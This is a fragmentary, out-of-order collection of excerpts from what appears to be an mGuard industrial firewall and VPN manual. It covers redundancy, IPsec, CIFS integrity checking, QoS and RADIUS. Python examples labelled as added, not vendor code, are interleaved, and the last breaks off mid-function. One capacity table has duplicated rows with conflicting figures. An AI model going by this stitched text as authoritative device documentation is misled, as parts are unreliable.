a valid, up-to-date copy of the VPN state database. As with state synchronization of the firewall, VPN state synchronization sends updates from the active mGuard to the mGuard on standby. If requested to do so by the mGuard on standby, the active mGuard sends a complete record of all state information.

Dedicated interface (mGuard centerport): In the case of the mGuard centerport, you can permanently assign the third Ethernet interface for the VPN state synchronization. As with the state synchronization of the firewall, the data traffic for the VPN state synchronization for the dedicated interface is transmitted when a variable is set. Under Redundancy >> Firewall Redundancy >> Redundancy, set the "Interface which is used for state synchronization" to Dedicated Interface.

Establishing VPN connections: In VPN redundancy, the virtual network interface is used for an additional purpose: to establish, accept and operate the VPN connections. The mGuard only listens on the first virtual IP address. In Router network mode, it listens at the first external and internal virtual IP addresses.

State monitoring: State monitoring is used to monitor state synchronization on both the VPN and firewall.

Status indicator: The status indicator shows additional detailed information on the status of VPN state synchronization. This is located directly next to the informa
access, you do not need to enter this port number after the address in the web browser of the remote partner. If a different port number is used, it should be entered after the IP address, e.g. https://123.124.125.21:442.

The mGuard authenticates itself to the partner (in this case the browser of the user) using a self-signed machine certificate. This is a unique certificate issued by Innominate for each mGuard. This means that every mGuard device is delivered with a unique self-signed machine certificate.

Update SSH and HTTPS keys: Generate new 2048-bit keys. Keys that have been generated using an older firmware might be weak and should be renewed.
- Click on this button to generate a new key.
- Observe the fingerprints of the new keys generated.
- Log in via HTTPS and compare the certificate information provided by the browser.

Management >> Web Settings >> Access

Allowed Networks (Screenshot: one rule row with From IP 0.0.0.0/0, Interface External, Action Accept, Log No.) Lists the firewall rules that have been set up. These apply for incoming data packets of an HTTPS remote access attempt. If multiple firewall rules are defined, these are queried starting from the top of the list of entries until an appropriate rule is found. This rule is then applied. If the list of rules contains further subsequent rules that could also apply, these
access for your anti-virus software.

9.3.1 CIFS Antivirus Scan Connector

(Screenshot: CIFS Server: Enable the server: Yes. Accessible as "exported av share": External 192.168.1.1, Internal 192.168.101.254, DMZ. Servers workgroup: WORKGROUP. Login: User, Password. Exported share's name: exported av share. Allow write access: No. Please note: To have the CIFS server enabled in the network mode Stealth, a management IP must be set. Allowed Networks: rule rows 0.0.0.0/0, DMZ, Accept, Log Yes; 0.0.0.0/0, External, Drop, Log Yes. These rules allow to grant remote access to the CIFS server of the mGuard. Please note: In router mode with NAT or port forwarding, the network ports required for the CIFS server have priority over port forwarding. Please note: Access to the CIFS server is granted from the internal side, via dial-in and VPN by default, and can be restricted by these firewall rules. Consolidated Imported Shares: Enabled, CIFS Share, Exported in Subdirectory, Mounted and usable.)

CIFS Integrity Monitoring >> CIFS AV Scan Connector

CIFS Server: Enable the server. No: CIFS server is not available. Yes: CIFS server is available.

CIFS Integrity Monitoring menu

CIFS Integrity Monitoring >>
actual IP address of the redundant pair. VPN partners must always use the virtual IP address of the redundant pair to send IKE messages or ESP traffic.

16.2.8 Transmission capacity with VPN redundancy

These values apply to Router network mode when the data traffic for state synchronization is transmitted without encryption. If the transmission capacity described here is exceeded, in the event of errors the switching time may be longer than that set.

Platform / Transmission capacity with firewall redundancy:
- mGuard centerport: 220 Mbps bidirectional, not more than 60,000 frames/s
- mGuard industrial rs, mGuard smart, mGuard core, mGuard pci (n MHz), mGuard blade, mGuard delta, EAGLE mGuard: 50 Mbps bidirectional, not more than 5550 frames/s
- mGuard industrial rs, mGuard smart, mGuard core, mGuard pci (n MHz), mGuard blade, mGuard delta, EAGLE mGuard: 17 Mbps bidirectional, not more than 2300 frames/s
- mGuard rs4000, mGuard rs4000 3G, mGuard smart, mGuard core, mGuard pci SD, mGuard delta: 17 Mbps bidirectional, not more than 2300 frames/s

"Bidirectional" includes traffic in both directions. For example, 1500 Mbps means that 750 Mbps is forwarded in each direction.

Fail-over switching time: The fail-over switching time can be set to 1, 3 or 10 seconds in the event of errors. The upper limit of 1 second is currently only adhered to by the mGuard centerpor
also kept for Dead Peer Detection until the renewal of the ISAKMP SA is complete.

An error interrupts the renewal of an IPsec SA: If an error interrupts the renewal of an IPsec SA, this is compensated in the same way as during the initial establishment of the SA. Until renewal of the ISAKMP SA is complete, the old outgoing and incoming IPsec SAs are retained until the VPN partner notices the change. VPN state synchronization ensures that the old IPsec SAs are retained throughout the entire time that the mGuard remains on standby. When the device becomes active, it can then continue with the encryption and decryption of the data traffic without the need for further action.

Loss of data packets during VPN state synchronization: State synchronization can cope with the loss of one of two back-to-back update packets. If more data packets are lost, this can result in a longer switching time in the event of errors.

The mGuard on standby has an obsolete machine certificate: X.509 certificates and private keys used by a redundant pair to authenticate itself as a VPN partner may need to be changed. The combination of a private key and certificate is hereafter referred to as a machine certificate. Each mGuard in a redundant pair must be reconfigured in order to switch the machine certificate. Both mGuard devices also require the same certificate so that their VPN partners view them as one and the same virtual VPN device. As each mGuard has to be r
and during which a new key should be created. Default setting: 540 seconds (9 minutes).

IPsec VPN >> Connections >> Edit >> IKE Options

Re-key Margin for the Traffic Limit: Only applies to IPsec SAs. The value 0 indicates that the traffic limit is not used. 0 must be set here when 0 is also set under IPsec SA Traffic Limit. If a value above 0 is entered, then a new limit is calculated from two values. The number of bytes entered here is subtracted from the value specified under IPsec SA Traffic Limit (i.e. the Hard Limit). The calculated value is then known as the Soft Limit. This specifies the number of bytes which must be encrypted for a new key to be negotiated for the IPsec SA. A further amount is subtracted when a Re-key Fuzz (see below) above 0 is entered. This is a percentage of the re-key margin. The percentage is entered under Re-key Fuzz. The re-key margin value must be lower than the Hard Limit. It must be significantly lower when a Re-key Fuzz is also added. If the IPsec SA Lifetime is reached earlier, the Soft Limit is ignored.

Re-key Fuzz: Maximum percentage by which Re-key Margin is to be increased at random. This is used to delay key exchange on machines with multiple VPN connections. Default setting: 100 percent.

Keying tries: Number of attempts to negotiate new keys with the part
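The Soft Limit calculation described for Re-key Margin and Re-key Fuzz, as an added example (not the mGuard firmware's own code): the function names are assumptions, the random fuzz source is injectable so the result can be checked, and the validation that margin plus maximum fuzz stays below the Hard Limit is this example's reading of "must be significantly lower".

```python
"""Soft-limit calculation for IPsec SA re-keying by traffic volume, following
the description of Re-key Margin (for the Traffic Limit) and Re-key Fuzz.
Added example; names and the FixedRng helper are assumptions, not firmware code."""
import random
from typing import Optional


class FixedRng(random.Random):
    """Random source that always yields one value (for deterministic checks)."""
    def __init__(self, value: int):
        super().__init__()
        self._value = value

    def randint(self, a: int, b: int) -> int:
        return min(max(self._value, a), b)


def rekey_soft_limit(hard_limit: int, margin: int, fuzz_percent: int = 100,
                     rng: Optional[random.Random] = None) -> int:
    """Return the byte count after which a new IPsec SA key is negotiated.

    hard_limit   IPsec SA Traffic Limit in bytes (0 = traffic limit not used)
    margin       Re-key Margin in bytes; must be 0 when hard_limit is 0
    fuzz_percent Re-key Fuzz: the margin is increased at random by up to this
                 percentage so that machines with many VPN connections do not
                 re-key all SAs at the same moment (default 100)
    Returns 0 when re-keying by traffic volume is not used."""
    if hard_limit == 0:
        if margin != 0:
            raise ValueError("Re-key Margin must be 0 when the IPsec SA Traffic Limit is 0")
        return 0
    if margin == 0:
        return 0                                   # margin 0: soft limit not used
    # Margin plus the largest possible fuzz must stay below the Hard Limit,
    # otherwise the soft limit could be reached immediately (or be negative).
    worst_case_margin = margin + margin * fuzz_percent // 100
    if worst_case_margin >= hard_limit:
        raise ValueError("Re-key Margin (plus fuzz) must be significantly lower than the Hard Limit")
    rng = rng or random.Random()
    fuzz = rng.randint(0, fuzz_percent)            # random share of the margin, in percent
    effective_margin = margin + margin * fuzz // 100
    return hard_limit - effective_margin


def soft_limit_range(hard_limit: int, margin: int, fuzz_percent: int = 100):
    """Smallest and largest Soft Limit that rekey_soft_limit can produce."""
    lowest = rekey_soft_limit(hard_limit, margin, fuzz_percent, rng=FixedRng(fuzz_percent))
    highest = rekey_soft_limit(hard_limit, margin, fuzz_percent, rng=FixedRng(0))
    return lowest, highest
```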
are based on UDP. Data always flows in both directions on TCP connections.

Redundancy

If the firewall of the mGuard is set up to only accept data packets from the initiator, the firewall accepts all related responses per se. This happens regardless of whether or not a relevant firewall rule is available. A scenario is conceivable in which the mGuard allows the initiating data packet to pass through and then fails before the relevant connection entry has been made in the other mGuard. The other mGuard may then reject the responses as soon as it becomes the active mGuard. The mGuard cannot correct this situation due to the single-sided connection. As a countermeasure, the firewall can be configured so that the connection can be established in both directions. This is normally already handled via the protocol layer and no additional assignment is required.

Loss of data packets during state synchronization: If data packets are lost during state synchronization, this is detected automatically by the mGuard, which then requests the active mGuard to send the data again. This request must be answered within a certain time; otherwise the mGuard on standby is assigned the outdated state and asks the active mGuard for a complete copy of all state information. The response time is calculated automatically from the fail-over switching time. This is longer than the time for presenc
are three different categories of personal injury that are indicated by a signal word.

DANGER: This indicates a hazardous situation which, if not avoided, will result in death or serious injury.

WARNING: This indicates a hazardous situation which, if not avoided, could result in death or serious injury.

CAUTION: This indicates a hazardous situation which, if not avoided, could result in minor or moderate injury.

This symbol together with the signal word NOTE and the accompanying text alert the reader to a situation which may cause damage or malfunction to the device, hardware, software or surrounding property.

This symbol and the accompanying text provide the reader with additional information or refer to detailed sources of information.

General terms and conditions of use for technical documentation: Innominate reserves the right to alter, correct and/or improve the technical documentation and the products described in the technical documentation at its own discretion and without giving prior notice, insofar as this is reasonable for the user. The same applies to any changes that serve the purpose of technical progress. The receipt of technical documentation (in particular user documentation) does not constitute any further duty on the part of Innominate to furnish information on modifications to products and/or technical documentation. You are responsible for verifying the suitability
be configured. From Version 8.0, the VPN configuration permits a remote network with different local networks in one configuration. The VPN tunnel groups are extended so that they permit an established VPN connection to select only one subnetwork from the local network. In previous versions, this was only possible for remote networks.

4 Management menu

For security reasons, we recommend you change the default root and administrator passwords during initial configuration (see Authentication >> Administrative Users on page 181). A message informing you of this will continue to be displayed at the top of the page until the passwords are changed.

4.1 Management >> System Settings

4.1.1 Host

(Screenshot: Management >> System Settings, tab pages Host, Time and Date, Shell Access, E-Mail. System Uptime: 52 min. Power supply 1: working. Power supply 2: working. System Temperature (°C): min 0, current 37.2, max 60. System DNS Hostname: Hostname mode: User defined (from field below); Hostname: mguard; Domain search path: example.local. SNMP Information: System Name, Location, Contact.)

Management >> System Settings >> Host

System Uptime: Device operating time since the last restart (only mGuard rs4000 3G, mGuard rs4000, mGuard centerport, mGuard industrial rs, EAGLE mGuard
been established for the connection.

Defining a VPN connection / VPN connection channels: Depending on the network mode of the mGuard, the following page appears after clicking on Edit.

10.2.2 General

(Screenshot: IPsec VPN >> Connections >> unnamed, tab pages General, Authentication, Firewall, IKE Options. Options: A descriptive name for the connection: unnamed. Initial Mode: Started. Address of the remote site's VPN gateway: any (either an IP address, a hostname, or %any for any IP, multiple clients or clients behind a NAT gateway). Interface to use for gateway setting %any: External. Connection startup: Wait. Controlling service input: None. Deactivation Timeout: 0 Minutes. Token for text message trigger. Encapsulate the VPN traffic in TCP: Yes. Transport and Tunnel Settings: Tunnel, 192.168.1.1/32.)

IPsec VPN >> Connections >> Edit >> General

Options: A descriptive name for the connection. The connection can be freely named / renamed. If several connection channels are defined under Transport and Tunnel Settings, then this name applies to the entire set of VPN connection channels grouped under this name. Similarities between VPN connection channels: same authentication method as s
73. can limit the outgoing or incoming access individually for each connection. Any attempts to bypass these restrictions can be logged.

By default the VPN firewall is set to allow all connections for this VPN connection. However, the extended firewall settings defined and explained above apply independently for each individual VPN connection (see Network Security menu on page 205, Network Security >> Packet Filter on page 205, Advanced on page 216).

If multiple firewall rules are defined, these are queried starting from the top of the list of entries until an appropriate rule is found. This rule is then applied. If the list of rules contains further subsequent rules that could also apply, these rules are ignored.

In Stealth mode, the actual IP address used by the client should be used in the firewall rules, or it should be left at 0.0.0.0/0, as only one client can be addressed through the tunnel.

If the Allow packet forwarding between VPN connections option is set to Yes on the Global tab page, the rules under Incoming are used for the incoming data packets to the mGuard and the rules under Outgoing are applied to the outgoing data packets. If the outgoing data packets are included in the same connection definition for a defined VPN connection group, then the firewall rules for Incoming and Outgoing for the same connection definition are used. If a different VPN connection definition ap
74. check is not currently active.

The mGuard creates a database with checksums in order to check whether files have been changed. A change to executable files indicates a virus. However, if these files have been changed intentionally, a new database must be created by clicking on Initialize in order to prevent false alarms. The creation of an integrity database is also recommended if network drives have been newly set up. Otherwise an integrity database is set up during the first scheduled check instead of a check being performed.

Click on Cancel to stop the integrity check.

CIFS Integrity Monitoring >> CIFS Integrity Checking >> Settings >> Edit >> Management

Erase reports and the integrity database: Click on Erase to delete all existing reports/databases. A new integrity database must be created for any further integrity checks. This can be initiated by clicking on Initialize. Otherwise a new integrity database is created automatically upon the next scheduled check. This procedure cannot be seen

9.2.2 Filename Patterns

(Screenshot: CIFS Integrity Monitoring >> CIFS Integrity Checking, tabs Settings, Filename Patterns. Sets of Filename Patterns: executables.)

CIFS Integrity Monitoring >> CIFS Integrity Checking >> Filename Patterns

Sets of Filename
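The checksum database described above, worked through as an added example (this is not code from the manual or from the mGuard firmware). It models "Initialize" as building a table of SHA-256 checksums for every file matching a pattern set, and a scheduled check as comparing the share against that table and reporting changed, added and deleted files. The pattern list EXECUTABLE_PATTERNS and the sample share built by demo() are constructed for the example; a check run immediately after initialization must come back clean, which is exactly why the manual says to re-initialize after intentional changes.

```python
import fnmatch
import hashlib
import os
import tempfile
from typing import Dict, List

# Pattern set standing in for the manual's "executables" set of filename patterns.
# The members listed here are an assumption for this example, not the device's own list.
EXECUTABLE_PATTERNS = ["*.exe", "*.dll", "*.sys", "*.com", "*.bat"]


def matches_patterns(name: str, patterns: List[str]) -> bool:
    """Case-insensitive glob match: file names on a Windows share are not case-sensitive."""
    lower = name.lower()
    return any(fnmatch.fnmatchcase(lower, p.lower()) for p in patterns)


def sha256_of(path: str) -> str:
    """Checksum of one file, read in chunks so large images on the share stay out of RAM."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_database(share_root: str, patterns: List[str]) -> Dict[str, str]:
    """'Initialize': record a checksum for every matching file below the share root."""
    database: Dict[str, str] = {}
    for dirpath, _dirs, files in os.walk(share_root):
        for name in files:
            if matches_patterns(name, patterns):
                full = os.path.join(dirpath, name)
                database[os.path.relpath(full, share_root)] = sha256_of(full)
    return database


def check_integrity(share_root: str, patterns: List[str], database: Dict[str, str]) -> Dict[str, List[str]]:
    """Scheduled check: compare the share's current state with the stored database."""
    current = build_database(share_root, patterns)
    return {
        "changed": sorted(p for p in database if p in current and current[p] != database[p]),
        "added": sorted(p for p in current if p not in database),
        "deleted": sorted(p for p in database if p not in current),
    }


def demo() -> Dict[str, List[str]]:
    """Constructed scenario: initialize, then tamper with one executable and add another."""
    with tempfile.TemporaryDirectory() as share:
        os.makedirs(os.path.join(share, "bin"))
        with open(os.path.join(share, "bin", "ctrl.exe"), "wb") as f:
            f.write(b"original program image")
        with open(os.path.join(share, "readme.txt"), "wb") as f:
            f.write(b"not covered by the pattern set")
        database = build_database(share, EXECUTABLE_PATTERNS)
        # A check straight after Initialize must be clean; anything else means a stale database.
        assert check_integrity(share, EXECUTABLE_PATTERNS, database) == {"changed": [], "added": [], "deleted": []}
        with open(os.path.join(share, "bin", "ctrl.exe"), "ab") as f:
            f.write(b" plus appended bytes")
        with open(os.path.join(share, "new.DLL"), "wb") as f:
            f.write(b"fresh module")
        return check_integrity(share, EXECUTABLE_PATTERNS, database)


if __name__ == "__main__":
    print(demo())
```

The report distinguishes a modified executable (a real integrity hit) from a newly added one; both warrant a look, but only after an intentional roll-out should the operator re-initialize the database rather than silence the alarm.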
75. click on Online License Request. The mGuard now establishes a connection via the Internet and installs the corresponding license on the mGuard if the voucher is valid.

Reload Licenses: This option can be used if the license installed on the mGuard has been deleted. Click on Online License Reload. The licenses that were previously issued for this mGuard are then retrieved from the server via the Internet and installed.

Manual License Installation

Order License: After clicking on Edit License Request Form, an online form is displayed which can be used to order the desired license. Enter the following information in the form:
• Voucher Serial Number: the serial number printed on your voucher
• Voucher Key: the voucher key on your voucher
• Flash ID: this is entered automatically
After sending the form, the license file is made available for download and can be installed on the mGuard in a further step.

Filename / Install license file: To install a license, first save the license file as a separate file on your computer, then proceed as follows:
• Click on Browse next to the Filename field. Select the file and open it so that the file name or path is displayed in the Filename field.
• Then click on Install license file.

4.3.3 Terms of License

(Screenshot: Management >> Licensing, tabs Overview, Install, Terms of License. mGuard Firmware License Inf
76. (Figure 6.1: Local Resolving of Hostnames. Plant network Ethernet with two machine cells, each behind a switch: cell b on 10.1.31.0/24 with Controller A "fold" 10.1.31.1/24, Controller B "fill" 10.1.31.2/24 and Controller C "pack" 10.1.31.3/24; cell c on 10.1.32.0/24 with Controller A "fold" 10.1.32.1/24, Controller B "fill" 10.1.32.2/24 and Controller C "pack" 10.1.32.3/24; all hostnames under the domain example.com. Legend: Host / Domain name.)

6.4.2 DynDNS

(Screenshot: Network >> DNS >> DynDNS. Register this mGuard at a DynDNS Service: No; Status; Status Message: DynDNS service disabled; Refresh Interval (sec) 420; DynDNS Provider: DynDNS compatible; DynDNS Server; DynDNS Port; DynDNS Login; DynDNS Password, New Password, New Password again; DynDNS Hostname host.example.com.)

In order for a VPN connection to be established, at least one partner IP address must be known so that the partners can contact each other. This condition is not met if both participants are assigned IP addresses dynamically by their respective Internet service providers. In this case a DynDNS service such as DynDNS.org or DNS4BIZ.com can be of assistance. With a DynDNS service the currently valid IP address is registered under a fixed name. If you ha
77. connection establishment with encapsulated packets.

For technical reasons the RAM requirements increase with each interface that is used to listen out for VPN connections encapsulated in TCP. If multiple interfaces need to be used for listening, then the device must have at least 64 Mbytes RAM. The interfaces to be used for listening are determined by the mGuard according to the settings on the active VPN connections that have %any configured as the partner. The decisive setting is specified under Interface to use for gateway setting %any.

IPsec VPN >> Global >> Options

TCP port to listen on: Number of the TCP port where the encapsulated data packets to be received arrive. The port number specified here must be the same as the one specified for the mGuard of the partner as the TCP port of the server which accepts the encapsulated connection (IPsec VPN >> Connections menu item, Edit, General tab page). The following restriction applies: The port to be used for listening must not be identical to a port that is being used for remote access (SSH, HTTPS or SEC Stick).

Server ID (0..63): Usually the default value 0 does not have to be changed. The numbers are used to differentiate between different control centers. A different n

IP Fragmentation

IKE Fragmentation
78. create a certificate, a private key and the corresponding public key are required. Programs are available so that any user can create these keys. Similarly a corresponding certificate with the corresponding public key can also be created, resulting in a self-signed certificate. Additional information about self-creation can be downloaded from www.innominate.com. It is available in the download area in an application note entitled "How to obtain X.509 certificates". A corresponding certificate signed by a CA must be requested from the CA.

In order for the private key to be imported into the mGuard with the corresponding certificate, these components must be packed into a PKCS#12 file (file name extension .p12).

Authentication methods

The mGuard uses two methods of X.509 authentication that are fundamentally different:

• The authentication of a partner is carried out based on the certificate and remote certificate. In this case the remote certificate that is to be consulted must be specified for each individual connection (e.g. for VPN connections).

• The mGuard consults the CA certificates provided to check whether the certificate shown by the partner is authentic. This requires all CA certificates to be made available to the mGuard in order to form a chain with the certificate shown by the partner through to the root certificate. "Available" means that the relevant CA certificates must be installed on the mGuard se
79. criteria specified on the left, i.e. that may pass through. The mGuard may drop the excess number of data packets in the event of capacity bottlenecks if this data stream delivers more data packets per second than specified.

The number entered specifies the maximum number of data packets per second or kbps that can pass through, according to the option set under Measurement Unit (see above). This applies to the data stream that conforms to the rule set criteria specified on the left, i.e. that may pass through. The mGuard drops the excess number of data packets if this data stream delivers more data packets per second than specified.

Comment: Optional comment text.

12.2 Egress Queues

The services are assigned corresponding priority levels. In the event of connection bottlenecks, the outgoing data packets are placed in egress queues (i.e. queues for pending packets) according to the assigned priority level and are then processed according to their priority. Ideally the assignment of priority levels and bandwidths should result in a sufficient bandwidth level always being available for the realtime transmission of data packets, while other packets (e.g. FTP downloads) are temporarily set to wait in critical cases.

The main application of egress QoS is the optimal utilization of the available bandwidth on a connection. In certain cases a limitation of the packet rate can be useful, e.g. t
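A simulation of the two mechanisms just described, the per-stream packet-rate limit and the strict-priority egress queues, as an added example (not code from the manual or the device). Packets arriving beyond a stream's limit within the current second are dropped before queueing; when the link can carry fewer packets than are waiting, the higher-priority queue is always drained first and the bulk traffic waits. The priorities, limits and packet names used in demo() are constructed for the example.

```python
from collections import deque
from typing import Deque, Dict, List, Optional, Tuple


class EgressScheduler:
    """Strict-priority egress queues with an optional packets-per-second limit per queue.

    Priority 0 is the highest. A limit of None means the stream is not rate-limited;
    otherwise packets arriving beyond the limit within the current second are dropped
    before they are queued, which is the behaviour the manual describes for the limit.
    """

    def __init__(self, limits_pps: Dict[int, Optional[int]]) -> None:
        self.queues: Dict[int, Deque[str]] = {prio: deque() for prio in limits_pps}
        self.limits = dict(limits_pps)
        self.seen_this_second = {prio: 0 for prio in limits_pps}
        self.dropped = {prio: 0 for prio in limits_pps}

    def new_second(self) -> None:
        """Reset the per-second arrival counters at the start of each interval."""
        for prio in self.seen_this_second:
            self.seen_this_second[prio] = 0

    def enqueue(self, prio: int, packet: str) -> bool:
        """Queue a packet; returns False when the rate limit forced a drop."""
        self.seen_this_second[prio] += 1
        limit = self.limits[prio]
        if limit is not None and self.seen_this_second[prio] > limit:
            self.dropped[prio] += 1
            return False
        self.queues[prio].append(packet)
        return True

    def transmit(self, capacity: int) -> List[str]:
        """Send up to `capacity` packets, always draining higher priorities first."""
        sent: List[str] = []
        for prio in sorted(self.queues):
            queue = self.queues[prio]
            while queue and len(sent) < capacity:
                sent.append(queue.popleft())
        return sent

    def backlog(self) -> Dict[int, int]:
        """Packets still waiting per queue after a transmit interval."""
        return {prio: len(queue) for prio, queue in self.queues.items()}


def demo() -> Tuple[List[str], int, Dict[int, int]]:
    """Constructed bottleneck: a burst of ten bulk FTP packets arrives before five
    realtime packets, the link carries eight packets this second, bulk is limited to 6 pps."""
    sched = EgressScheduler({0: None, 2: 6})
    for i in range(10):
        sched.enqueue(2, f"ftp-{i}")
    for i in range(5):
        sched.enqueue(0, f"rt-{i}")
    sent = sched.transmit(capacity=8)
    return sent, sched.dropped[2], sched.backlog()


if __name__ == "__main__":
    print(demo())
```

Even though the FTP burst arrived first, all five realtime packets go out ahead of it; four bulk packets were dropped by the limit and three remain queued for the next interval.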
80. device before a major release upgrade (e.g. from Version 4.x.y to Version 5.x.y, or from Version 5.x.y to Version 6.x.y) can be installed. The license must be installed on the device before updating the firmware (see Management >> Licensing on page 67 and Install on page 67). Minor release upgrades (i.e. within the same major version, e.g. within Version 5.x.y) can be installed without a license until further notice.

4.3.5 Overview

(Screenshot: Management >> Update >> Overview. System Information: Version 8.0.0.default, Base 8.0.0.default, Updates none. Package Versions: authdaemon 0.0.3.0.default, bcron 0.1.4.0.default, bridge-utils 0.1.5.0.default, brnetlink 0.0.2.1.default, busybox 0.1.9.1.default, chat 0.2.8.0.default, conntrack 0.1.2.0.default.)

Management >> Update >> Overview

System Information
Version: The current software version of the mGuard.
Base: The software version that was originally used to flash this mGuard.
Updates: List of updates that have been installed on the base.
Package Versions: Lists the individual software modules of the mGuard. Can be used for support purposes.

4.3.6 Update

Firmware updates with firewall redundancy enabled: Updates of Version 7.3.1 or later can be performed while an mGuard redundant pair is connected and operating. This does not apply to the following devices: mGuard industrial rs
81. devices that are connected to the same Ethernet segment through their external/internal interface. Please note that CARP uses the same protocol and port as VRRP (Virtual Router Redundancy Protocol). The ID set here must be different to the IDs on other devices which use VRRP or CARP and are located in the same Ethernet segment.

Internal virtual IP addresses: As described under External virtual IP addresses, but with two exceptions. Under Internal virtual IP addresses, IP addresses are defined for devices which belong to the internal Ethernet segment. These devices must use the IP address as their default gateway. These addresses can be used as a DNS or NTP server when the mGuard is configured as a server for the protocols. For each virtual IP address an actual IP address must be configured whose IP network accommodates the virtual address. The response to ICMP requests with internal virtual IP addresses is independent from the settings made under Network Security >> Packet Filter >> Advanced.

Encrypted state synchronization

Encrypt the state messages: Yes / No. If Yes is selected, state synchronization is encrypted.

Passphrase: The password is changed as described under Passphrase for availability checks on page 307. Only deviate from the prescribed approach if an incorrect password has been inadvertently entered.

Redundancy menu: Redundancy >> Fi
82. displayed under CIFS Integrity Monitoring >> CIFS AV Scan Connector >> Accessible as:
\\<External IP of mGuard>\<Name of the exported share>
\\<Internal IP of mGuard>\<Name of the exported share>
Example: the external IP 10.1.66.49 or the internal IP 192.168.66.49, each followed by the name of the exported share (named "exported av share" in the screenshot).

Alternatively you can enter the net use command in the command line. For further information please refer to the Microsoft product information.

Notes:
• DNS names can also be used instead of the IP address.
• The authorized network drive cannot be found using the browse or search function. The exported share's name must always be added.
• Windows does not automatically display the authorized network drive upon connection of the mGuard.

10 IPsec VPN menu

This menu is not available on the mGuard blade controller.

10.1 IPsec VPN >> Global

10.1.1 Options

(Screenshot: IPsec VPN >> Global, tabs Options, DynDNS Monitoring. Options: Allow packet forwarding between VPN connections No (the value Yes will not be applied to the network mode Stealth); Archive diagnostic messages for VPN connections No; TCP Encapsulation; IP Fragmentation.)

IP Fragmentation: Some routers fail to forward large UDP packets, which may break the IPsec protocol. The following opt
83. for VPN redundancy. If the required license keys are installed, VPN redundancy is automatically activated at the same time as firewall redundancy. This occurs as soon as Enable redundancy is set to Yes in the Redundancy >> Firewall Redundancy >> Redundancy menu. There is no separate menu for VPN redundancy. The existing firewall redundancy variables are expanded.

Table 16.3 Expanded functions with VPN redundancy activated

Redundancy >> Firewall Redundancy >> Redundancy

General
Enable redundancy: Firewall redundancy and VPN redundancy are activated or deactivated.

Virtual interfaces
External virtual IP addresses: Only in Router network mode. The mGuard uses the first external virtual IP address as the address from which it sends and receives IKE messages. The external virtual IP address is used instead of the actual primary IP address of the external network interface. The mGuard no longer uses the actual IP address to send or answer IKE messages. ESP data traffic is handled similarly, but is also accepted and processed by the actual IP address.
Internal virtual IP addresses: As described under External virtual IP addresses, but for internal virtual IP addresses.

16.2.5 Requirements for VPN redundancy

VPN redundancy can only be activated if a license key is installed for VPN redundancy and a VPN connection is activated m
84. for administrative users whose password is checked using a RADIUS server when accessing the mGuard. Each of these groups can be assigned an administrative role.

Authentication >> Administrative Users >> RADIUS Filters

This menu item is not included in the scope of functions for the mGuard rs2000 3G and mGuard rs2000.

The mGuard only checks passwords using RADIUS servers if you have activated RADIUS authentication:
• For shell access, see menu Management >> System Settings >> Shell Access.
• For web access, see menu Management >> Web Settings >> Access.

The RADIUS filters are searched consecutively. When the first match is found, access is granted with the corresponding role (admin, netadmin, audit).

After a RADIUS server has checked and accepted a user's password, it sends the mGuard a list of filter IDs in its response. These filter IDs are assigned to the user in a server database. They are used by the mGuard for assigning the group and hence the authorization level as admin, netadmin or audit.

If authentication is successful, this is noted as part of the mGuard's logging process. Other user actions are logged here using the original name of the user. The log messages are forwarded to a SysLog server, provided a SysLog server has been approved by the mGuard. The following actions are recorded: Login, Logout, Start of a firmware update, Changes to the configuration
85. >> User Firewall on page 225).

7.2.1 Firewall Users

This menu is not available on the mGuard rs2000 3G.

Administrative access simultaneously via X.509 authentication and via login to the mGuard user firewall is not possible with the Safari browser.

(Screenshot: Authentication >> Firewall Users, tabs Firewall Users, Access, Status. Users; Enable user firewall Yes; Enable group authentication No; user Service_1, authentication method LocalDB.)

Authentication >> Firewall Users >> Firewall Users

Users: Lists the firewall users by their assigned user names. Also specifies the authentication method.

Enable user firewall: Under the Network Security >> User Firewall menu item, firewall rules can be defined and assigned to specific firewall users. When set to Yes, the firewall rules assigned to the listed users are applied as soon as the corresponding user logs in.

Enable group authentication: If activated, the mGuard forwards login requests for unknown users to the RADIUS server. If successful, the response from the RADIUS server will contain a group name. The mGuard then enables user firewall templates containing this group name as the template user. The RADIUS server must be configured to deliver this group name in the Access-Accept packet as a Filter-ID <group name> attribute.

User Name: Name specified by the user during login.

Authentication g
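Both the RADIUS Filters for administrative roles and the group authentication for firewall users described above rest on the same mechanism: Filter-Id attributes in the server's Access-Accept, matched against a configured list from the top down. The following added example (not code from the manual or the mGuard firmware) shows the client side of that: it checks the reply's Response Authenticator against the shared secret (RFC 2865), extracts the Filter-Id attributes, and assigns the first configured filter that the reply contains. The shared secret, the filter IDs in RADIUS_FILTERS and the reply built by demo() are constructed for the example; the authenticity check is what stops a tampered or spoofed reply from handing out a role.

```python
import hashlib
import hmac
import struct
from typing import List, Optional, Tuple

ACCESS_ACCEPT = 2        # RADIUS packet code (RFC 2865)
ATTR_FILTER_ID = 11      # Filter-Id attribute type (RFC 2865)

# Filter table in the order an administrator would enter it under RADIUS Filters.
# The filter ID strings are constructed for this example.
RADIUS_FILTERS: List[Tuple[str, str]] = [
    ("mguard-admin", "admin"),
    ("mguard-netadmin", "netadmin"),
    ("mguard-audit", "audit"),
]


def response_authenticator(code: int, ident: int, length: int, request_auth: bytes,
                           attrs: bytes, secret: bytes) -> bytes:
    """RFC 2865: MD5(Code + ID + Length + RequestAuthenticator + Attributes + Secret)."""
    header = struct.pack("!BBH", code, ident, length)
    return hashlib.md5(header + request_auth + attrs + secret).digest()


def build_access_accept(ident: int, request_auth: bytes, secret: bytes, filter_ids: List[str]) -> bytes:
    """Construct the server's reply (only so the example runs offline)."""
    attrs = b"".join(bytes([ATTR_FILTER_ID, 2 + len(v)]) + v.encode() for v in filter_ids)
    length = 20 + len(attrs)
    auth = response_authenticator(ACCESS_ACCEPT, ident, length, request_auth, attrs, secret)
    return struct.pack("!BBH", ACCESS_ACCEPT, ident, length) + auth + attrs


def verify_response(packet: bytes, request_auth: bytes, secret: bytes) -> bool:
    """Accept the reply only if its authenticator was produced with our shared secret."""
    code, ident, length = struct.unpack("!BBH", packet[:4])
    if length != len(packet) or length < 20:
        return False
    expected = response_authenticator(code, ident, length, request_auth, packet[20:], secret)
    return hmac.compare_digest(expected, packet[4:20])


def parse_attributes(packet: bytes) -> List[Tuple[int, bytes]]:
    """Walk the type/length/value list that follows the 16-byte authenticator."""
    attrs, pos = [], 20
    while pos < len(packet):
        atype, alen = packet[pos], packet[pos + 1]
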